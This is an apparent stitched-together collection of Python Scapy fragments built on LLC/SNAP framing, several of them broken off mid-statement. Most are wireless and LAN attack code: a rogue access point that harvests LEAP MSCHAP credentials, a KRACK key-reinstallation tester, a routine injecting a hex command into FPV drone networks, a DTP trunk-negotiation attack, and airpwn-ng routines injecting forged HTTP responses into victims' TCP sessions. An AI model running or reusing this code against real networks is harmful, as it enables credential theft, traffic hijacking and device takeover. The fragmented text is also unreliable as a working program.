def handleLEAP(self, sockObj, identity):
self.networkDescriptor.addEapType(17)
tries = self.max_tries
while tries:
tries -= 1
sockObj.send('\x00\x00' / LLC(dsap=0xaa, ssap=0xaa, ctrl=3) /
SNAP(code=0x888e) / EAPOL(version=2, type=0) /
EAP(code=1, type=17, id=2) /
LEAP(data=self.mschap_challenge),
FCfield=2,
raw=True)
data = sockObj.recv()
if data is None:
continue
if not data.haslayer(EAP):
continue
if not data.haslayer(LEAP):
eap = data.getlayer(EAP)
if eap.type == 3:
return 1, tuple(eap.eap_types)
continue
leap = data.getlayer(LEAP)
sockObj.clientDescriptor.addIdentity(17, identity)
sockObj.clientDescriptor.addEapType(17)
sockObj.clientDescriptor.addMSChapInfo(17, self.mschap_challenge,
leap.data, identity)
return 0, None
if tries != self.max_tries:
return 2, None
def search_n_destroy(iface: str):
setup_monitor(iface)
pkts_stream = sniff_gen(iface=iface)
for pkt in pkts_stream:
if UDP in pkt:
dgram = pkt[UDP]
if dgram.dport == 5555:
frame = (
RadioTap() / Dot11FCS(
subtype=8,
type="Data",
proto=0,
FCfield="to-DS",
addr1=pkt[Dot11].addr1,
addr2=pkt[Dot11].addr2,
addr3=pkt[Dot11].addr3,
) /
Dot11QoS(Reserved=0, Ack_Policy=0, EOSP=0, TID=0, TXOP=0) /
LLC(dsap=0xAA, ssap=0xAA, ctrl=3) /
SNAP(OUI=0x0, code="IPv4") / IP(version=4,
proto="udp",
src=pkt[IP].src,
dst=pkt[IP].dst) /
UDP(sport=6666, dport=5555) / Raw(load=bytes.fromhex(
"436d640001001200010404000a000000808080802020202010652f"
)))
sendp(frame, iface=iface)
break
def negotiate_trunk(iface=conf.iface, mymac=str(RandMAC())):
print("Trying to negotiate a trunk on interface %s" % iface)
p = Dot3(src=mymac,
dst="01:00:0c:cc:cc:cc") / LLC() / SNAP() / DTP(tlvlist=[
DTPDomain(),
DTPStatus(),
DTPType(),
DTPNeighbor(neighbor=mymac)
])
sendp(p)
def llc_enumerate(self, timeout):
bcast = "ff:ff:ff:ff:ff:ff"
bcast_packet = LLC() / SNAP() / s01fd.S01FD(type=0x0500)
answers = self._ether_.sendrcv_timeout(bcast, bcast_packet, timeout)
macs = []
for x in answers:
if x.haslayer(s01fd.S01FD):
if x[s01fd.S01FD].type == 0x0501:
macs.append(x.src)
return macs
def send_ether_over_wpa(self, pkt, **kwargs):
"""Send an Ethernet packet using the WPA channel
Extra arguments will be ignored, and are just left for compatibiliy
"""
payload = LLC() / SNAP() / pkt[Ether].payload
dest = pkt.dst
if dest == "ff:ff:ff:ff:ff:ff":
self.send_wpa_to_group(payload, dest)
else:
assert dest == self.client
self.send_wpa_to_client(payload)
def accept(self):
"""
This extends the WirelessStateMachineSoftAP accept() method but
adds in the exchange of EAP identities.
"""
while not self.__shutdown__:
(sockObj, clientMAC) = WirelessStateMachineSoftAP.accept(self)
tries = self.max_tries
while tries:
tries -= 1
data = sockObj.recv()
if not data:
continue
if data.haslayer(EAPOL):
tries = self.max_tries
break
elif data.haslayer('Dot11AssoReq'):
sockObj.send(self.asso_resp_data, 0, 1, 0x10, True)
if tries != self.max_tries:
continue # shit failed in that loop up there
sockObj.sequence = 1
while tries:
tries -= 1
sockObj.send('\x00\x00' / LLC(dsap=0xaa, ssap=0xaa, ctrl=3) /
SNAP(code=0x888e) / EAPOL(version=2, type=0) /
EAP(code=1,
type=1,
id=0,
identity='\x00networkid=' + self.essid +
',nasid=AP,portid=0'),
FCfield=2,
raw=True)
data = sockObj.recv()
if data is None:
continue
if not data.haslayer(EAP):
continue
data = data.getlayer(EAP)
if not 'identity' in data.fields:
continue
tries = self.max_tries
break
if tries != self.max_tries:
continue
eaptype = self.eap_priorities[0]
self.eap_handlers[eaptype](sockObj, data.identity)
self.networkDescriptor.addClient(sockObj.clientDescriptor)
return sockObj, clientMAC
def handlePEAP(self, sockObj, identity):
"""
This is not yet supported. Don't even bother trying.
"""
self.networkDescriptor.addEapType(25)
tries = self.max_tries
while tries:
tries -= 1
sockObj.send('\x00\x00' / LLC(dsap=0xaa, ssap=0xaa, ctrl=3) /
SNAP(code=0x888e) / EAPOL(version=2, type=0) /
EAP(code=1, type=25, id=2) /
PEAP(version=1, flags='start'),
FCfield=2,
raw=True)
return 0, None
if tries != self.max_tries:
return 2, None
def krack_proceed(self, send_3handshake=False, send_gtk=False):
if send_3handshake:
rep = RadioTap()
rep /= Dot11(
addr1=self.client,
addr2=self.mac,
addr3=self.mac,
FCfield='from-DS',
SC=(next(self.seq_num) << 4),
subtype=0,
type="Data",
)
rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
data = self.RSN
data += self.build_GTK_KDE()
eap_2 = self.build_EAPOL_Key_8021X2004(
# Key information 0x13c9:
# ARC4 HMAC-MD5, Pairwise Key, Install, KEY ACK, KEY MIC, Secure,
# Encrypted, SMK
key_information=0x13c9,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
data=data,
key_mic=self.kck,
key_data_encrypt=self.kek,
)
rep /= eap_2
if self.encrypt_3handshake:
self.send_wpa_to_client(rep[LLC])
else:
self.send(rep)
self.krack_state |= 1
if send_gtk:
self.krack_state |= 2
# Renew the GTK
self.install_GTK()
raise self.RENEW_GTK()
def send_wpa_handshake_3(self, pkt):
# Both nonce have been exchanged, install keys
client_nonce = pkt[EAPOL].load[13:13 + 0x20]
self.install_unicast_keys(client_nonce)
# Check client MIC
# Data: full message with MIC place replaced by 0s
# https://stackoverflow.com/questions/15133797/creating-wpa-message-integrity-code-mic-with-python
client_mic = pkt[EAPOL].load[77:77 + 16]
client_data = raw(pkt[EAPOL]).replace(client_mic,
"\x00" * len(client_mic))
assert hmac.new(self.kck, client_data,
hashlib.md5).digest() == client_mic
rep = RadioTap()
rep /= Dot11(
addr1=self.client,
addr2=self.mac,
addr3=self.mac,
FCfield='from-DS',
SC=(next(self.seq_num) << 4),
)
rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
self.install_GTK()
data = self.RSN
data += self.build_GTK_KDE()
eap = self.build_EAPOL_Key_8021X2004(
key_information=0x13c9,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
data=data,
key_mic=self.kck,
key_data_encrypt=self.kek,
)
self.send(rep / eap)
def send_renew_gtk(self):
rep_to_enc = LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep_to_enc /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
data = self.build_GTK_KDE()
eap = self.build_EAPOL_Key_8021X2004(
# Key information 0x1381:
# ARC4 HMAC-MD5, Group Key, KEY ACK, KEY MIC, Secure, Encrypted,
# SMK
key_information=0x1381,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
data=data,
key_mic=self.kck,
key_data_encrypt=self.kek,
)
rep_to_enc /= eap
self.send_wpa_to_client(rep_to_enc)
def send_wpa_handshake_1(self):
self.anonce = self.gen_nonce(32)
rep = RadioTap()
rep /= Dot11(
addr1=self.client,
addr2=self.mac,
addr3=self.mac,
FCfield='from-DS',
SC=(next(self.seq_num) << 4),
)
rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3)
rep /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication
rep /= self.build_EAPOL_Key_8021X2004(
key_information=0x89,
replay_counter=next(self.replay_counter),
nonce=self.anonce,
)
self.send(rep)
def search_n_destroy(iface: str):
setup_monitor(iface)
pkts_stream = sniff_gen(iface=iface)
for pkt in pkts_stream:
if Dot11Beacon in pkt:
beacon = pkt[Dot11Beacon]
network = beacon.network_stats()
ssid = network.get("ssid")
if ssid and ssid.startswith("FPV_"):
print(network)
sender = "b2:43:f6:64:a2:bb"
bssid = "14:6b:9c:58:75:07"
frame = send_asso_req(sender, bssid, ssid)
sendp(frame, iface=iface)
frame = (
RadioTap() / Dot11FCS(
subtype=8,
type="Data",
proto=0,
FCfield="to-DS",
addr1=bssid,
addr2=sender,
addr3=bssid,
) /
Dot11QoS(Reserved=0, Ack_Policy=0, EOSP=0, TID=0, TXOP=0) /
LLC(dsap=0xAA, ssap=0xAA, ctrl=3) /
SNAP(OUI=0x0, code="IPv4") / IP(version=4,
proto="udp",
src="172.16.10.187",
dst="172.16.10.1") /
UDP(sport=6666, dport=5555) / Raw(load=bytes.fromhex(
"436d640001001200010404000a000000808080802020202010652f"
)))
print(frame)
sendp(frame, iface=iface)
def send_arp_req(self):
if self.krack_state & 4 == 0:
# Set the address for future uses
self.arp_target_ip = self.dhcp_server.leases.get(self.client,
self.arp_target_ip)
assert self.arp_target_ip is not None
# Send the first ARP requests, for control test
log_runtime.info("Send ARP who-was from '%s' to '%s'",
self.arp_source_ip,
self.arp_target_ip)
arp_pkt = self.send_wpa_to_group(
LLC()/SNAP()/ARP(op="who-has",
psrc=self.arp_source_ip,
pdst=self.arp_target_ip,
hwsrc=self.mac),
dest='ff:ff:ff:ff:ff:ff',
)
self.arp_sent.append(arp_pkt)
else:
if self.arp_to_send < len(self.arp_sent):
# Re-send the ARP requests already sent
self.send(self.arp_sent[self.arp_to_send])
self.arp_to_send += 1
else:
# Re-send GTK
self.arp_to_send = 0
self.arp_retry += 1
log_runtime.info("Trying to trigger CVE-2017-13080 %d/%d",
self.arp_retry, self.ARP_MAX_RETRY)
if self.arp_retry > self.ARP_MAX_RETRY:
# We retries 100 times to send GTK, then already sent ARPs
log_runtime.warning("Client is likely not vulnerable to "
"CVE-2017-13080")
raise self.EXIT()
raise self.RENEW_GTK()
def deal_common_pkt(self, pkt):
# Send to DHCP server
# LLC / SNAP to Ether
if SNAP in pkt:
ether_pkt = Ether(src=self.client,dst=self.mac) / pkt[SNAP].payload
self.dhcp_server.reply(ether_pkt)
# If an ARP request is made, extract client IP and answer
if ARP in pkt and \
pkt[ARP].op == 1 and pkt[ARP].pdst == self.dhcp_server.gw:
if self.arp_target_ip is None:
self.arp_target_ip = pkt[ARP].psrc
log_runtime.info("Detected IP: %s", self.arp_target_ip)
# Reply
ARP_ans = LLC()/SNAP()/ARP(
op="is-at",
psrc=self.arp_source_ip,
pdst=self.arp_target_ip,
hwsrc=self.mac,
hwdst=self.client,
)
self.send_wpa_to_client(ARP_ans)
from scapy.utils import rdpcap
from pyDot11.__init__ import wepEncrypt
from pyDot11.lib.utils import Pcap
from pyDot11.lib.wep import Wep
#Sending from a pcap
wepPkts = rdpcap('PCAPs/ICMPs/wep_pings.pcap')
wepPkts.summary()
input = wepPkts.__class__(str(wepPkts)[0:-4])
#print(input.summary())
sendp(wepPkts)
# Sending a simple packet
sender='08:00:27:c6:e4:20'
dest='08:00:27:1b:8b:a3'
packet=Dot11(addr1=dest,addr2=sender,addr3=sender)/LLC()/SNAP()/IP(src="192.168.3.7",dst="192.168.3.5")/ICMP()/"Hello!"
print(packet.summary())
#print(packet.show())
sendp(packet)
encPkt = wepEncrypt(packet,'0123456789')
print(encPkt.summary())
#print(encPkt.show())
sendp(encPkt)
#Sending a Dot11 Beacon packet
SSID = 'Test SSID'
iface = 'eth0'
dot11 = Dot11(type=0, subtype=8,
addr1='ff:ff:ff:ff:ff:ff',
addr2=sender,
def inject(self, vicmac, rtrmac, dstmac, vicip, svrip, vicport, svrport,
acknum, seqnum, injection, TSVal, TSecr):
"""Send the injection using Scapy
This method is where the actual packet is created for sending
Things such as payload and associated flags are genned here
FIN/ACK flag is sent to the victim with this method
"""
## Headers
headers = self.hdr.default(injection)
## Monitor
if self.args.inj == 'mon':
## WEP/WPA
if self.args.wep or self.args.wpa:
packet = RadioTap()\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = dstmac,
subtype = 8,
type = 2
)\
/Dot11QoS()\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
## Open
else:
packet = RadioTap()\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = dstmac
)\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None and TSecr is not None:
packet[TCP].options = [('NOP', None), ('NOP', None),
('Timestamp', ((round(time.time()),
TSVal)))]
else:
packet[TCP].options = [('NOP', None), ('NOP', None),
('Timestamp', ((round(time.time()), 0)))
]
## WPA
if self.args.wpa is not None:
if self.shake.encDict.get(vicmac) == 'ccmp':
### Why are we incrementing here? Been done before in wpaEncrypt(), verify this.
try:
self.shake.PN[5] += 1
except:
self.shake.PN[4] += 1
try:
packet = wpaEncrypt(
self.shake.tgtInfo.get(vicmac)[1],
self.shake.origPkt, packet, self.shake.PN, True)
except:
sys.stdout.write(
Bcolors.FAIL +
'\n[!] pyDot11 did not work\n[!] Injection failed\n '
+ Bcolors.ENDC)
sys.stdout.flush()
else:
sys.stdout.write(
Bcolors.FAIL +
'\n[!] airpwn-ng cannot inject TKIP natively\n[!] Injection failed\n '
+ Bcolors.ENDC)
sys.stdout.flush()
## WEP Injection
elif self.args.wep is not None:
try:
packet = wepEncrypt(packet, self.args.wep)
except:
sys.stdout.write(
Bcolors.FAIL +
'\n[!] pyDot11 did not work\n[!] Injection failed\n ' +
Bcolors.ENDC)
sys.stdout.flush()
## Managed
else:
headers = self.hdr.default(injection)
packet = Ether(\
src = self.injMac,\
dst = vicmac\
)\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None:
packet[TCP].options = [\
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), TSVal)))\
]
else:
packet[TCP].options = [\
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), 0)))\
]
## Inject
gs(self.injSocket, packet, verbose=False)
print('[*] Packet injected to {0}'.format(vicmac))
def gen_layer2_traffic(self, iface, num_packets, pkt_interval,
max_phy_broadcast_rate_mbps, **kwargs):
self.log.info('gen_layer2_traffic ... here 802.11()')
ipdst = kwargs.get('ipdst')
ipsrc = kwargs.get('ipsrc')
# get my MAC HW address
myMacAddr = self.getHwAddr(iface)
dstMacAddr = 'ff:ff:ff:ff:ff:ff'
if pkt_interval is not None:
# generate with some packet interval
if num_packets > 255:
num_packets = 255
data = (RadioTap() / Dot11(type=2,
subtype=0,
addr1=dstMacAddr,
addr2=myMacAddr,
addr3=myMacAddr) / LLC() / SNAP() /
IP(dst=ipdst, src=ipsrc, ttl=(1, num_packets)))
sendp(data, iface=iface, inter=pkt_interval)
return 1.0 / pkt_interval
else:
assert max_phy_broadcast_rate_mbps is not None
ipPayloadSize = kwargs["ipPayloadSize"]
phyBroadcastMbps = kwargs["phyBroadcastMbps"]
use_tcpreplay = kwargs.get('use_tcpreplay')
# craft packet to be transmitted
payload = 'Z' * ipPayloadSize
data = (RadioTap() / Dot11(type=2,
subtype=0,
addr1=dstMacAddr,
addr2=myMacAddr,
addr3=myMacAddr) / LLC() / SNAP() /
IP(dst=ipdst, src=ipsrc) / payload)
# send 10 packets backlogged
now = datetime.now()
if use_tcpreplay:
# use tcprelay
sendpfast(data,
iface=iface,
mbps=phyBroadcastMbps,
loop=num_packets,
file_cache=True)
else:
piter = (len(data) * 8) / (phyBroadcastMbps * 1e6)
sendp(data,
iface=iface,
loop=1,
inter=piter,
realtime=True,
count=num_packets,
verbose=0)
delta = datetime.now() - now
myDelta = delta.seconds + delta.microseconds / 1000000.0
# calc achieved transmit data rate
tx_frame_rate = (1.0 / (myDelta / num_packets))
self.log.info('gen80211L2LinkProbing(): tx_frame_rate=%d' %
int(tx_frame_rate))
return tx_frame_rate
def inject(self, tgtmac, rtrmac, dstmac, tgtip, svrip, tgtport, svrport,
acknum, seqnum, injection, TSVal, TSecr):
"""Send the injection using Scapy
This method is where the actual packet is created for sending things
such as the payload and associated flags.
FIN/ACK flag is sent to the target with this method.
"""
## Headers
headers = self.hdr.default(injection)
if self.args.tun is False:
## Monitor injection
if self.args.inj == 'mon':
packet = RadioTap()\
/Dot11(
FCfield = 'from-DS',
addr1 = tgtmac,
addr2 = rtrmac,
addr3 = dstmac
)\
/LLC()\
/SNAP()\
/IP(
dst = tgtip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(tgtport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None and TSecr is not None:
packet[TCP].options = [('NOP', None), ('NOP', None),
('Timestamp', ((round(time.time()),
TSVal)))]
else:
packet[TCP].options = [('NOP', None), ('NOP', None),
('Timestamp', ((round(time.time()),
0)))]
## Managed injection
else:
headers = self.hdr.default(injection)
packet = Ether(
src = self.injMac,\
dst = tgtmac\
)\
/IP(
dst = tgtip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(tgtport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None:
packet[TCP].options = [\
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), TSVal)))\
]
else:
packet[TCP].options = [\
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), 0)))\
]
## Managed
else:
try:
headers = self.hdr.default(injection)
packet = Ether(
src = self.injMac,\
dst = tgtmac\
)\
/IP(
dst = tgtip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(tgtport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None:
packet[TCP].options = [
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), TSVal)))\
]
else:
packet[TCP].options = [
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), 0)))\
]
except Exception as E:
print(E)
## Inject
try:
gs(self.injSocket, packet, verbose=False)
print('[*] Packet injected to {0}'.format(tgtmac))
except Exception as E:
print(E)
def inject(self, vicmac, rtrmac, dstmac, vicip, svrip, vicport, svrport,
acknum, seqnum, injection, TSVal, TSecr):
"""Send the injection using Scapy
This method is where the actual packet is created for sending
Things such as payload and associated flags are genned here
FIN/ACK flag is sent to the victim with this method
"""
global npackets
npackets += 1
sys.stdout.write(Bcolors.OKBLUE + '[*] Injecting Packet to victim ' +
Bcolors.WARNING + vicmac + Bcolors.OKBLUE +
' (TOTAL: ' + str(npackets) + ' injected packets)\r' +
Bcolors.ENDC)
sys.stdout.flush()
## Injection using Monitor Mode
if self.args.inj == 'mon':
hdr = Headers()
headers = hdr.default(injection)
## WEP/WPA
if self.args.wep or self.args.wpa:
packet = self.rTap\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = dstmac,
subtype = 8L,
type = 2
)\
/Dot11QoS()\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
## Open
else:
packet = RadioTap()\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = dstmac
)\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None and TSecr is not None:
packet[TCP].options = [('NOP', None), ('NOP', None),
('Timestamp', ((round(time.time()),
TSVal)))]
else:
packet[TCP].options = [('NOP', None), ('NOP', None),
('Timestamp', ((round(time.time()), 0)))
]
## WPA Injection
if self.args.wpa is not None:
if self.shake.encDict.get(vicmac) == 'ccmp':
### Why are we incrementing here? Been done before in wpaEncrypt(), verify this.
try:
self.shake.PN[5] += 1
except:
self.shake.PN[4] += 1
try:
packet = wpaEncrypt(
self.shake.tgtInfo.get(vicmac)[1],
self.shake.origPkt, packet, self.shake.PN, True)
except:
sys.stdout.write(
Bcolors.FAIL +
'\n[!] pyDot11 did not work\n[!] Injection failed\n '
+ Bcolors.ENDC)
sys.stdout.flush()
else:
sys.stdout.write(
Bcolors.FAIL +
'\n[!] airpwn-ng cannot inject TKIP natively\n[!] Injection failed\n '
+ Bcolors.ENDC)
sys.stdout.flush()
#packet = wpaEncrypt(self.shake.tgtInfo.get(vicmac)[0],
#self.shake.origPkt,
#packet,
#self.shake.PN,
#True)
if self.args.v is False:
sendp(packet, iface=self.interface, verbose=0)
else:
sendp(packet, iface=self.interface, verbose=1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)
## WEP Injection
elif self.args.wep is not None:
try:
packet = wepEncrypt(packet, self.args.wep)
except:
sys.stdout.write(
Bcolors.FAIL +
'\n[!] pyDot11 did not work\n[!] Injection failed\n ' +
Bcolors.ENDC)
sys.stdout.flush()
if self.args.v is False:
sendp(packet, iface=self.interface, verbose=0)
else:
sendp(packet, iface=self.interface, verbose=1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)
## Open WiFi Injection
else:
if self.args.v is False:
sendp(packet, iface=self.interface, verbose=0)
else:
sendp(packet, iface=self.interface, verbose=1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)
### Single packet exit point
### Used for BeEF hook examples and such
if self.args.single is True:
sys.stdout.write(Bcolors.OKBLUE +
'[*] Injecting Packet to victim ' +
Bcolors.WARNING + vicmac + Bcolors.OKBLUE +
' (TOTAL: ' + str(npackets) +
' injected packets)\r' + Bcolors.ENDC)
sys.exit(0)
## Injection using Managed Mode
else:
hdr = Headers()
headers = hdr.default(injection)
packet = Ether(\
src = self.getHwAddr(self.interface),\
dst = vicmac\
)\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None:
packet[TCP].options = [\
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), TSVal)))\
]
else:
packet[TCP].options = [\
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), 0)))\
]
if self.args.v is False:
sendp(packet, iface=self.interface, verbose=0)
else:
sendp(packet, iface=self.interface, verbose=1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)
def check_eap_type(self,
essid,
eaptype,
outer_identity='user',
eapol_start=False,
rsnInfo=''):
"""
Check that an eaptype is supported.
errDict = {
0:"supported",
1:"not supported",
2:"could not determine",
3:"identity rejected"
}
"""
eapid = randint(1, 254)
if eapol_start:
eapol_start_request = (RadioTap() / Dot11(FCfield=0x01,
addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
type=2,
subtype=8) / Dot11QoS() /
LLC(dsap=170, ssap=170, ctrl=3) /
SNAP(code=0x888e) /
EAPOL(version=1, type=1))
self.sequence += 1
i = 0
for i in range(0, EAP_MAX_TRIES):
self.__thread_sendp__(eapol_start_request)
if not self.lastpacket is None:
if self.lastpacket.haslayer('EAP'):
fields = self.lastpacket.getlayer('EAP').fields
if 'type' in fields and fields['type'] == 1 and fields[
'code'] == 1:
i = 0
eapid = fields['id']
break
if i == 2:
return 2
eap_identity_response = (
RadioTap() / Dot11(FCfield=0x01,
addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
type=2,
subtype=8) / Dot11QoS() /
LLC(dsap=170, ssap=170, ctrl=3) / SNAP(code=0x888e) /
EAPOL(version=1, type=0) /
EAP(code=2, type=1, id=eapid, identity=outer_identity))
eap_legacy_nak = (
RadioTap() / Dot11(FCfield=0x01,
addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
type=2,
subtype=8) / Dot11QoS() /
LLC(dsap=170, ssap=170, ctrl=3) / SNAP(code=0x888e) /
EAPOL(version=1, type=0, len=6) /
EAP(code=2, type=3, id=eapid + 1, eap_types=[eaptype]))
self.sequence += 1
for i in range(0, EAP_MAX_TRIES):
self.__thread_sendp__(eap_identity_response)
if not self.lastpacket is None:
if self.lastpacket.haslayer('EAP'):
fields = self.lastpacket.getlayer('EAP').fields
if fields['code'] == 4: # 4 is a failure
return 3
if 'type' in fields and fields['type'] == eaptype:
return 0
i = 0
break
if i == 2:
return 2
for i in range(0, EAP_MAX_TRIES):
self.__thread_sendp__(eap_legacy_nak)
if not self.lastpacket is None:
if self.lastpacket.haslayer('EAP'):
fields = self.lastpacket.getlayer('EAP').fields
if 'type' in fields and fields['type'] == eaptype:
return 0
else:
return 1
return 2
def create_base_packet(self):
packet = (
Dot3(src=self.interface.remote_mac, dst="01:00:0c:cc:cc:cc") /
LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) / SNAP() / CDPv2_HDR())
return packet
def inject(self, vicmac, rtrmac, vicip, svrip, vicport, svrport, acknum,
seqnum, injection, TSVal, TSecr):
"""Send the injection using Scapy
This method is where the actual packet is created for sending
Things such as payload and associated flags are genned here
FIN/ACK flag is sent to the victim with this method
"""
## HTML headers
headers = '\r\n'.join([
'HTTP/1.1 200 OK', 'Date: {}'.format(
time.strftime('%a, %d %b %Y %H:%M:%S GMT', time.gmtime())),
'Server: Apache', 'Content-Length: {}'.format(len(injection)),
'Connection: close', 'Content-Type: text/html\r\n\r\n'
])
## Monitor
if self.args.inj == 'mon':
## WEP/WPA
if self.args.wep or self.args.wpa:
# packet = self.rTap\
packet = RadioTap()\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = rtrmac,
subtype = 8L,
type = 2
)\
/Dot11QoS()\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
## Open
else:
packet = RadioTap()\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = rtrmac
)\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
## Managed
else:
packet = Ether(src = self.getHwAddr(self.interface), dst=vicmac)\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None and TSecr is not None:
packet[TCP].options = [('NOP', None), ('NOP', None),
('Timestamp', ((round(time.time()), TSVal)))
]
else:
packet[TCP].options = [('NOP', None), ('NOP', None),
('Timestamp', ((round(time.time()), 0)))]
## Encrypt if using monitor mode
if self.args.inj == 'mon':
## WPA Injection
if self.args.wpa is not None:
## CCMP
if self.shake.encDict.get(vicmac) == 'ccmp':
try:
self.shake.PN[5] += 1
except:
self.shake.PN[4] += 1
packet = wpaEncrypt(
self.shake.tgtInfo.get(vicmac)[1], self.shake.origPkt,
packet, self.shake.PN,
False) ### DEBUG SET TO FALSE FOR NOW
## TKIP, use --inj man as a workaround
else:
print(
'[!] airpwn-ng cannot inject TKIP natively\n[!] Injection failed\n[!] Use --inj "man" as a workaround'
)
sys.exit()
#packet = wpaEncrypt(self.shake.tgtInfo.get(vicmac)[0],
#self.shake.origPkt,
#packet,
#self.shake.PN,
#True)
## WEP
elif self.args.wep is not None:
packet = wepEncrypt(packet, self.args.wep)
## Inject
sendp(packet, iface=self.interface, verbose=False)
# gs(self.injSocket, packet, verbose = False)
print('[*] Packet injected to {0}'.format(vicmac))
def dup_snap(pkt):
s_pkt = pkt.getlayer(SNAP)
oui = s_pkt.OUI
code = s_pkt.code
n_pkt = SNAP(OUI=oui, code=code)
return n_pkt
def dupSNAP(pkt):
sPkt = pkt.getlayer(SNAP)
oui = sPkt.OUI
code = sPkt.code
nPkt = SNAP(OUI=oui, code=code)
return nPkt
'type': 0x8809,
'load': Raw('\x02') / Raw('\0' * 49)
},
'oam': {
'mac': '01:80:c2:00:00:02',
'type': 0x8809,
'load': Raw('\x03') / Raw('\0' * 49)
},
'lbd': {
'mac': '01:80:c2:00:00:02',
'type': 0x8809,
'load': Raw('\xFF') / Raw('\0' * 49)
},
'cdp': {
'mac': '01:00:0c:cc:cc:cc',
'load': LLC() / SNAP(OUI=0x00000C, code=0x2000) / Raw('\0' * 370)
},
'pagp': {
'mac': '01:00:0c:cc:cc:cc',
'load': LLC() / SNAP(OUI=0x00000C, code=0x0104) / Raw('\0' * 62)
},
'udld': {
'mac': '01:00:0c:cc:cc:cc',
'load': LLC() / SNAP(OUI=0x00000C, code=0x0111) / Raw('\0' * 60)
},
'vtp': {
'mac': '01:00:0c:cc:cc:cc',
'load': LLC() / SNAP(OUI=0x00000C, code=0x2003) / Raw('\0' * 77)
},
'pvst': {
'mac': '01:00:0c:cc:cc:cd',
frame = frame / IP(dst = ip_dst, src = ip_src, tos = tos_val, ttl = ttl)
return add_payload(frame, size, pattern)
## Utility to create dummy protocols frames #######################################################
pdu_info = {
'stp' : { 'mac' : '01:80:c2:00:00:00', 'load' : LLC() / STP() },
'rstp' : { 'mac' : '01:80:c2:00:00:00', 'load' : LLC() / STP(version = 2) / Raw('\0') },
'lldp' : { 'mac' : '01:80:c2:00:00:0e', 'type' : 0x88cc, 'load' : Raw('\0' * 282) },
